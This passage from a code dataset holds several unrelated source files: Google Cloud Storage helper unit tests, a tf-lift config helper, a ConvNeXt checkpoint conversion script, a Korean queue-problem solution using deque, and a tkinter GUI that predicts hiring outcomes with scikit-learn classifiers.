{STORAGE_EMULATOR_ENV_VAR: HOST}):\n host = self._call_fut()\n\n self.assertEqual(host, HOST)\n\n\nclass Test__get_environ_project(unittest.TestCase):\n @staticmethod\n def _call_fut():\n from google.cloud.storage._helpers import _get_environ_project\n\n return _get_environ_project()\n\n def test_wo_env_var(self):\n with mock.patch(\"os.environ\", {}):\n project = self._call_fut()\n\n self.assertEqual(project, None)\n\n def test_w_env_var(self):\n from google.auth import environment_vars\n\n PROJECT = \"environ-project\"\n\n with mock.patch(\"os.environ\", {environment_vars.PROJECT: PROJECT}):\n project = self._call_fut()\n self.assertEqual(project, PROJECT)\n\n with mock.patch(\"os.environ\", {environment_vars.LEGACY_PROJECT: PROJECT}):\n project = self._call_fut()\n\n self.assertEqual(project, PROJECT)\n\n\nclass Test_PropertyMixin(unittest.TestCase):\n @staticmethod\n def _get_default_timeout():\n from google.cloud.storage.constants import _DEFAULT_TIMEOUT\n\n return _DEFAULT_TIMEOUT\n\n @staticmethod\n def _get_target_class():\n from google.cloud.storage._helpers import _PropertyMixin\n\n return _PropertyMixin\n\n def _make_one(self, *args, **kw):\n return self._get_target_class()(*args, **kw)\n\n def _derivedClass(self, path=None, user_project=None):\n class Derived(self._get_target_class()):\n client = None\n _actual_encryption_headers = None\n\n @property\n def path(self):\n return path\n\n @property\n def user_project(self):\n return user_project\n\n def _encryption_headers(self):\n return self._actual_encryption_headers or {}\n\n return Derived\n\n def test_path_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.path\n\n def test_client_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.client\n\n def test_user_project_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.user_project\n\n def test__encryption_headers(self):\n mixin = self._make_one()\n self.assertEqual(mixin._encryption_headers(), {})\n\n def test__query_params_wo_user_project(self):\n derived = self._derivedClass(\"/path\", None)()\n self.assertEqual(derived._query_params, {})\n\n def test__query_params_w_user_project(self):\n user_project = \"user-project-123\"\n derived = self._derivedClass(\"/path\", user_project)()\n self.assertEqual(derived._query_params, {\"userProject\": 
user_project})\n\n def test_reload_w_defaults(self):\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload()\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"noAcl\"}\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_etag_match(self):\n etag = \"kittens\"\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(\n if_etag_match=etag,\n )\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n }\n # no encryption headers by default\n expected_headers = {\n \"If-Match\": etag,\n }\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_generation_match_w_timeout(self):\n generation_number = 9\n metageneration_number = 6\n path = \"/path\"\n timeout = 42\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(\n if_generation_match=generation_number,\n if_metageneration_match=metageneration_number,\n timeout=timeout,\n )\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n \"ifGenerationMatch\": generation_number,\n \"ifMetagenerationMatch\": metageneration_number,\n }\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=timeout,\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_user_project_w_retry(self):\n user_project = \"user-project-123\"\n path = \"/path\"\n retry = mock.Mock(spec=[])\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(retry=retry)\n\n self.assertEqual(derived._properties, response)\n 
self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n \"userProject\": user_project,\n }\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=retry,\n _target_object=derived,\n )\n\n def test_reload_w_projection_w_explicit_client_w_enc_header(self):\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n encryption_headers = {\"bar\": \"Bar\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived._actual_encryption_headers = encryption_headers\n\n derived.reload(projection=\"full\", client=client)\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"full\"}\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=encryption_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test__set_properties(self):\n mixin = self._make_one()\n self.assertEqual(mixin._properties, {})\n VALUE = object()\n mixin._set_properties(VALUE)\n self.assertEqual(mixin._properties, VALUE)\n\n def test__patch_property(self):\n derived = self._derivedClass()()\n derived._patch_property(\"foo\", \"Foo\")\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n\n def test_patch_w_defaults(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = derived.client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n\n derived.patch()\n\n self.assertEqual(derived._properties, api_response)\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = {\"bar\": bar}\n expected_query_params = {\"projection\": \"full\"}\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_patch_w_metageneration_match_w_timeout_w_retry(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = derived.client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n timeout = 42\n retry = mock.Mock(spec=[])\n generation_number = 9\n metageneration_number = 6\n\n derived.patch(\n if_generation_match=generation_number,\n if_metageneration_match=metageneration_number,\n timeout=timeout,\n retry=retry,\n )\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = 
{\"bar\": bar}\n expected_query_params = {\n \"projection\": \"full\",\n \"ifGenerationMatch\": generation_number,\n \"ifMetagenerationMatch\": metageneration_number,\n }\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=timeout,\n retry=retry,\n _target_object=derived,\n )\n\n def test_patch_w_user_project_w_explicit_client(self):\n path = \"/path\"\n user_project = \"user-project-123\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n\n derived.patch(client=client)\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = {\"bar\": bar}\n expected_query_params = {\n \"projection\": \"full\",\n \"userProject\": user_project,\n }\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_w_defaults(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = derived.client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n\n derived.update()\n\n self.assertEqual(derived._properties, api_response)\n # Make sure changes get reset by update().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"full\"}\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_with_metageneration_not_match_w_timeout_w_retry(self):\n path = \"/path\"\n generation_number = 6\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = derived.client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n timeout = 42\n\n derived.update(\n if_metageneration_not_match=generation_number,\n timeout=timeout,\n )\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"full\",\n \"ifMetagenerationNotMatch\": generation_number,\n }\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=timeout,\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_w_user_project_w_retry_w_explicit_client(self):\n user_project = 
\"user-project-123\"\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n retry = mock.Mock(spec=[])\n\n derived.update(client=client, retry=retry)\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"full\",\n \"userProject\": user_project,\n }\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=retry,\n _target_object=derived,\n )\n\n\nclass Test__scalar_property(unittest.TestCase):\n def _call_fut(self, fieldName):\n from google.cloud.storage._helpers import _scalar_property\n\n return _scalar_property(fieldName)\n\n def test_getter(self):\n class Test(object):\n def __init__(self, **kw):\n self._properties = kw.copy()\n\n do_re_mi = self._call_fut(\"solfege\")\n\n test = Test(solfege=\"Latido\")\n self.assertEqual(test.do_re_mi, \"Latido\")\n\n def test_setter(self):\n class Test(object):\n def _patch_property(self, name, value):\n self._patched = (name, value)\n\n do_re_mi = self._call_fut(\"solfege\")\n\n test = Test()\n test.do_re_mi = \"Latido\"\n self.assertEqual(test._patched, (\"solfege\", \"Latido\"))\n\n\nclass Test__base64_md5hash(unittest.TestCase):\n def _call_fut(self, bytes_to_sign):\n from google.cloud.storage._helpers import _base64_md5hash\n\n return _base64_md5hash(bytes_to_sign)\n\n def test_it(self):\n from io import BytesIO\n\n BYTES_TO_SIGN = b\"FOO\"\n BUFFER = BytesIO()\n BUFFER.write(BYTES_TO_SIGN)\n BUFFER.seek(0)\n\n SIGNED_CONTENT = self._call_fut(BUFFER)\n self.assertEqual(SIGNED_CONTENT, b\"kBiQqOnIz21aGlQrIp/r/w==\")\n\n def test_it_with_stubs(self):\n import mock\n\n class _Buffer(object):\n def __init__(self, return_vals):\n self.return_vals = return_vals\n self._block_sizes = []\n\n def read(self, block_size):\n self._block_sizes.append(block_size)\n return self.return_vals.pop()\n\n BASE64 = _Base64()\n DIGEST_VAL = object()\n BYTES_TO_SIGN = b\"BYTES_TO_SIGN\"\n BUFFER = _Buffer([b\"\", BYTES_TO_SIGN])\n MD5 = _MD5(DIGEST_VAL)\n\n patch = mock.patch.multiple(\n \"google.cloud.storage._helpers\", base64=BASE64, md5=MD5\n )\n with patch:\n SIGNED_CONTENT = self._call_fut(BUFFER)\n\n self.assertEqual(BUFFER._block_sizes, [8192, 8192])\n self.assertIs(SIGNED_CONTENT, DIGEST_VAL)\n self.assertEqual(BASE64._called_b64encode, [DIGEST_VAL])\n self.assertEqual(MD5._called, [None])\n self.assertEqual(MD5.hash_obj.num_digest_calls, 1)\n self.assertEqual(MD5.hash_obj._blocks, [BYTES_TO_SIGN])\n\n\nclass Test__add_etag_match_headers(unittest.TestCase):\n def _call_fut(self, headers, **match_params):\n from google.cloud.storage._helpers import _add_etag_match_headers\n\n return _add_etag_match_headers(headers, **match_params)\n\n def test_add_etag_match_parameters_str(self):\n ETAG = \"kittens\"\n headers = {\"foo\": \"bar\"}\n EXPECTED_HEADERS = {\n \"foo\": \"bar\",\n \"If-Match\": ETAG,\n }\n self._call_fut(headers, if_etag_match=ETAG)\n self.assertEqual(headers, EXPECTED_HEADERS)\n\n def test_add_generation_match_parameters_list(self):\n ETAGS = [\"kittens\", \"fluffy\"]\n EXPECTED_HEADERS = 
{\n \"foo\": \"bar\",\n \"If-Match\": \", \".join(ETAGS),\n }\n headers = {\"foo\": \"bar\"}\n self._call_fut(headers, if_etag_match=ETAGS)\n self.assertEqual(headers, EXPECTED_HEADERS)\n\n\nclass Test__add_generation_match_parameters(unittest.TestCase):\n def _call_fut(self, params, **match_params):\n from google.cloud.storage._helpers import _add_generation_match_parameters\n\n return _add_generation_match_parameters(params, **match_params)\n\n def test_add_generation_match_parameters_list(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n EXPECTED_PARAMS = [\n (\"param1\", \"value1\"),\n (\"param2\", \"value2\"),\n (\"ifGenerationMatch\", GENERATION_NUMBER),\n (\"ifMetagenerationMatch\", METAGENERATION_NUMBER),\n ]\n params = [(\"param1\", \"value1\"), (\"param2\", \"value2\")]\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n self.assertEqual(params, EXPECTED_PARAMS)\n\n def test_add_generation_match_parameters_dict(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n EXPECTED_PARAMS = {\n \"param1\": \"value1\",\n \"param2\": \"value2\",\n \"ifGenerationMatch\": GENERATION_NUMBER,\n \"ifMetagenerationMatch\": METAGENERATION_NUMBER,\n }\n\n params = {\"param1\": \"value1\", \"param2\": \"value2\"}\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n self.assertEqual(params, EXPECTED_PARAMS)\n\n def test_add_generation_match_parameters_tuple(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n\n params = ((\"param1\", \"value1\"), (\"param2\", \"value2\"))\n with self.assertRaises(ValueError):\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n\n\nclass Test__bucket_bound_hostname_url(unittest.TestCase):\n def _call_fut(self, **args):\n from google.cloud.storage._helpers import _bucket_bound_hostname_url\n\n return _bucket_bound_hostname_url(**args)\n\n def test_full_hostname(self):\n HOST = \"scheme://domain.tcl\"\n self.assertEqual(self._call_fut(host=HOST), HOST)\n\n def test_hostname_and_scheme(self):\n HOST = \"domain.tcl\"\n SCHEME = \"scheme\"\n EXPECTED_URL = SCHEME + \"://\" + HOST\n\n self.assertEqual(self._call_fut(host=HOST, scheme=SCHEME), EXPECTED_URL)\n\n\nclass Test__api_core_retry_to_resumable_media_retry(unittest.TestCase):\n def test_conflict(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n with self.assertRaises(ValueError):\n _api_core_retry_to_resumable_media_retry(retry=DEFAULT_RETRY, num_retries=2)\n\n def test_retry(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(retry=DEFAULT_RETRY)\n self.assertEqual(retry_strategy.max_sleep, DEFAULT_RETRY._maximum)\n self.assertEqual(retry_strategy.max_cumulative_retry, DEFAULT_RETRY._deadline)\n self.assertEqual(retry_strategy.initial_delay, DEFAULT_RETRY._initial)\n self.assertEqual(retry_strategy.multiplier, DEFAULT_RETRY._multiplier)\n\n def test_num_retries(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(\n retry=None, num_retries=2\n )\n self.assertEqual(retry_strategy.max_retries, 2)\n\n def test_none(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n 
)\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(retry=None)\n self.assertEqual(retry_strategy.max_retries, 0)\n\n\nclass _MD5Hash(object):\n def __init__(self, digest_val):\n self.digest_val = digest_val\n self.num_digest_calls = 0\n self._blocks = []\n\n def update(self, block):\n self._blocks.append(block)\n\n def digest(self):\n self.num_digest_calls += 1\n return self.digest_val\n\n\nclass _MD5(object):\n def __init__(self, digest_val):\n self.hash_obj = _MD5Hash(digest_val)\n self._called = []\n\n def __call__(self, data=None):\n self._called.append(data)\n return self.hash_obj\n\n\nclass _Base64(object):\n def __init__(self):\n self._called_b64encode = []\n\n def b64encode(self, value):\n self._called_b64encode.append(value)\n return value\n","repo_name":"googleapis/python-storage","sub_path":"tests/unit/test__helpers.py","file_name":"test__helpers.py","file_ext":"py","file_size_in_byte":25175,"program_lang":"python","lang":"en","doc_type":"code","stars":346,"dataset":"github-code","pt":"23"} +{"seq_id":"33192884283","text":"import numpy as np\n\n\ndef get_ratio_scale(config):\n \"\"\"Calculate ratio_scale from other configs\"\"\"\n\n kp_input_size = config.kp_input_size\n kp_base_scale = config.kp_base_scale\n ratio_scale = (float(kp_input_size) / 2.0) / kp_base_scale\n\n return ratio_scale\n\n\ndef get_patch_size_no_aug(config):\n \"\"\"Determine large patch size without rotation augmentations\"\"\"\n\n desc_input_size = config.desc_input_size\n desc_support_ratio = config.desc_support_ratio\n\n ratio_scale = get_ratio_scale(config)\n patch_size = np.round(\n float(desc_input_size) * ratio_scale / desc_support_ratio)\n\n return patch_size\n\n\ndef get_patch_size(config):\n \"\"\"Get the large patch size from other configs\"\"\"\n\n patch_size = get_patch_size_no_aug(config)\n if config.use_augmented_set:\n patch_size = np.ceil(np.sqrt(2) * patch_size)\n\n return patch_size\n\n\n#\n# config.py ends here\n","repo_name":"cvlab-epfl/tf-lift","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"23"} +{"seq_id":"4856453703","text":"import torch\nimport argparse\n\n# For D2, we need to convert nn.Parameters to nn.Embedding\n# this script is used to convert the original ckpt to the needed form\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"ConvNeXt converter\")\n\n parser.add_argument(\"--source_model\", default=\"weights/convnext_tiny_1k_224_ema.pth\", type=str, help=\"Path or url to the DETR model to convert\")\n parser.add_argument(\"--output_model\", default=\"weights/convnext_tiny_1k_224_ema_new.pth\", type=str, help=\"Path where to save the converted model\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n ckpt = torch.load(args.source_model, map_location=\"cpu\")\n state_dict = ckpt[\"model\"]\n change_list = [\"downsample_layers.0.1.bias\", \"downsample_layers.0.1.weight\",\n \"downsample_layers.1.0.bias\", \"downsample_layers.1.0.weight\",\n \"downsample_layers.2.0.bias\", \"downsample_layers.2.0.weight\",\n \"downsample_layers.3.0.bias\", \"downsample_layers.3.0.weight\"]\n # new ckpt\n ckpt_new = {\"model\":{}}\n for k in state_dict.keys():\n if (\"gamma\" in k) or (\"norm\" in k) or k in change_list:\n ckpt_new[\"model\"][k+\".weight\"] = state_dict[k].unsqueeze(0)\n else:\n ckpt_new[\"model\"][k] = state_dict[k]\n torch.save(ckpt_new, 
args.output_model)","repo_name":"MasterBin-IIAU/UNINEXT","sub_path":"conversion/convert_convnext.py","file_name":"convert_convnext.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"23"} +{"seq_id":"35813533214","text":"# 큐 2 (실4)\n# https://www.acmicpc.net/problem/18258\n\n# 시간제한 있는 문제 (3초)\n\n'''\n큐 문제 풀어보기\n\n큐(queue)\n선입선출\n쌓이는 것은 뒤로만 쌓이고 빼는건 앞에서부터 뺀다.\n\n\n(확인요망)빼고나서 인덱스가 당겨지지 않는다. 뺀 공간은 빈자리로 남겨둔다. (새롭게 채워넣지 않음)\n문제를 풀때 가장 앞자리 인덱스가 0으로 된 것을 확인했다..\n\n\n���같은 큐 라면 덱을 사용해서 풀어도 되는지?\n\n'''\n\n# 1. 덱을 이용해서 풀어보기 ============\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nd = deque()\n\nfor i in range(n):\n input_ord = input().split()\n order = input_ord[0]\n\n if order == 'push':\n d.append(input_ord[1])\n \n elif order == 'pop':\n if len(d) == 0:\n print(-1)\n else:\n print(d.popleft())\n \n elif order == 'size':\n print(len(d))\n \n elif order == 'empty':\n if len(d) == 0:\n print(1)\n else:\n print(0)\n elif order == 'front':\n if len(d) == 0:\n print(-1)\n else:\n print(d[0]) # deque의 경우도 앞의 값이 빠지면 인덱스가 0으로 되는걸...??\n elif order == 'back':\n if len(d) == 0:\n print(-1)\n else:\n print(d[-1]) \n \n\n\n\n","repo_name":"bbugi/python_algorithm","sub_path":"backjoon/완료/18258(실4).py","file_name":"18258(실4).py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22791208250","text":"from tkinter import *\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm,datasets\nimport csv\n#pa =\"E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv\"\ndf=pd.read_csv('E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv')\n\nwin=Tk()\nframe1=Frame(win, width=200, height=130)\nframe2=Frame(win, width=200, height=130)\nframe3=Frame(win, width=400, height=50)\n\nwin.title('Hire Predictor')\nX=df[['PERCENTAGE','BACKLOG','INTERNSHIP','FIRSTROUND','COMMUNICATIONSKILLLS']]\ny=df[['Hired']]\ndef Logistic():\n global result\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3,random_state=0)\n model2=LogisticRegression()\n model2.fit(X_train,y_train)\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result=model2.predict(l)\n if result==1:\n result='Hired'\n else:\n result=\"Not Hired\"\n out.delete('1.0',END)\n out.insert(END,result)\n return result\ndef Decision_Tree():\n global result1\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n clf=tree.DecisionTreeClassifier()\n clf=clf.fit(X,y)\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result1=clf.predict(l)\n if result1==1:\n result1='Hired'\n else:\n result1=\"Not Hired\"\n out1.delete('1.0',END)\n out1.insert(END,result1)\n return result1\ndef Random_Forest():\n global result2\n clf2=RandomForestClassifier(n_estimators=10)\n clf2=clf2.fit(X,y)\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result2=clf2.predict(l)\n if result2==1:\n result2='Hired'\n else:\n 
result2=\"Not Hired\"\n out2.delete('1.0',END)\n out2.insert(END,result2)\n return result2\ndef SVM():\n global result3\n C=2.0\n svc=svm.SVC(kernel='linear',C=C)\n svc=svc.fit(X,y)\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result3=svc.predict(l)\n if result3==1:\n result3='Hired'\n else:\n result3=\"Not Hired\"\n out3.delete('1.0',END)\n out3.insert(END,result3)\n return result3\ndef res():\n b1=result\n b2=result1\n b3=result2\n b4=result3\n if b1=='Hired' and b2=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b2=='Hired' and b3=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b2=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b2=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n else:\n fresult='Not Hired'\n out4.delete('1.0',END)\n out4.insert(END,fresult)\n if fresult=='Hired':\n res=1\n else:\n res=0\n x=var1.get()\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n row = [x,a,b,c,d,e,res]\n with open('E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(row)\n csvFile.close()\n return\n# def mess():\n# tkinter.messagebox.showinfo('window Title','Hired')\n# made by abhishek bhardwaj jims student git profile : https://github.com/abhi7104\n# tkinter.messagebox.showinfo('window Title','Not Hired')\n# return\n#win.configure(bg='brown')\nheading = Label(win, text='Hire Predictor',bg='brown',fg='white',font = ('Aerial' , 25),borderwidth = 10) \n\n\nname=Label(frame1, text='Name :',font=20,pady=9)\npercentage=Label(frame1,text='Percentage :',font=20,padx=9,pady=9)\nbacklogs=Label(frame1,text='Backlogs :',font=20,padx=9,pady=9)\ninternship=Label(frame1,text='Internship :',font=20,padx=9,pady=9)\nfirstround=Label(frame1,text=\"Firstround :\",font=20,padx=9,pady=9)\ncommunication=Label(frame1,text='Communication :',font=20,padx=9,pady=9)\n\n\nvar1=StringVar()\nvar2=IntVar()\nvar3=IntVar()\nvar4=IntVar()\nvar5=IntVar()\nvar6=IntVar()\n\nnam=Entry(frame1,text=var1,bd=3)\nper=Entry(frame1,text=var2,bd=3)\nbackl=Entry(frame1,text=var3,bd=3)\ninte=Entry(frame1,text=var4,bd=3)\nfirs=Entry(frame1,text=var5,bd=3)\ncomm=Entry(frame1,text=var6,bd=3)\n\nbutton=Button(frame2,text='Logistic',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Logistic)\nbutton1=Button(frame2,text='Decision Tree',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Decision_Tree)\nbutton2=Button(frame2,text='Random Forest',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Random_Forest)\nbutton3=Button(frame2,text='SVM',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=SVM)\nresult=Button(frame3,text='Final Result',font=('Courier',11),bd=5,width=13,command=res)\n\n# algo=Label(frame2, text='algo',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo1=Label(win,text='algo1',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo2=Label(win,text='algo2',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo3=Label(win,text='algo3',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# made by abhishek bhardwaj jims student git profile : 
